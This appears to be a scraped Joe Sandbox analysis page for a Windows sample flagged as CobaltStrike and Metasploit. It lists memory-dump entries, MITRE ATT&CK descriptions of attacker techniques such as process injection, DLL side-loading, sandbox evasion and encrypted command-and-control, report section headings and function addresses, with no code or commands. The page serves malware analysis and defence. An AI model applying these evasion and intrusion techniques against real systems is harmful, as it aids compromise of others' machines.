Associated: 00000000.00000002.4136727118.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4136738409.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4136748950.0000000000406000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vNenBbeRFZ.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeaveValue
String ID:
API String ID: 682475483-0
Opcode ID: 6e30223941b86afa10848f0d5096be72c6a0a595559ac87bbe0e3125a306d99e
Instruction ID: 248217c3d1a1add33d4541f1e8c0755c42397736bb50eb021b143816f9f18c15
Opcode Fuzzy Hash: 6e30223941b86afa10848f0d5096be72c6a0a595559ac87bbe0e3125a306d99e
Instruction Fuzzy Hash: E6F0A4716017108BD7107FBCDAC851B7BB4EA44340B060579DD856B346D778E814CBAA

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report vNenBbeRFZ.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: CobaltStrike

Threatname: Metasploit

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

HTTP Request Dependency Graph

Windows Analysis Report
vNenBbeRFZ.exe

Function 0040116C Relevance: 19.7, APIs: 13, Instructions: 199
sleepstringCOMMON

Function 03D76C99 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 123
COMMONLIBRARYCODE

Function 004013C1 Relevance: 12.1, APIs: 8, Instructions: 108
stringCOMMON

Function 004011A3 Relevance: 10.6, APIs: 7, Instructions: 114
sleepstringCOMMON

Function 00401160 Relevance: 9.1, APIs: 6, Instructions: 130
sleepstringCOMMON

Function 03D77AF5 Relevance: 9.1, APIs: 6, Instructions: 113
networkCOMMONLIBRARYCODE

Function 03D7C187 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44
encryptionCOMMONLIBRARYCODE

Function 03D72972 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 169
networkfileCOMMONLIBRARYCODE

Function 03D71B65 Relevance: 21.4, APIs: 14, Instructions: 422
fileCOMMONLIBRARYCODE

Function 00401805 Relevance: 21.0, APIs: 3, Strings: 9, Instructions: 31
threadCOMMON

Function 03D76DF0 Relevance: 12.1, APIs: 8, Instructions: 124
COMMONLIBRARYCODE

Function 03D7131C Relevance: 7.8, APIs: 5, Instructions: 280
COMMONLIBRARYCODE

Function 03D792E4 Relevance: 7.6, APIs: 5, Instructions: 63
filememoryCOMMONLIBRARYCODE

Function 0040156C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47
memorythreadCOMMON

Function 001100CE Relevance: 6.1, APIs: 4, Instructions: 75
networkmemoryfileCOMMON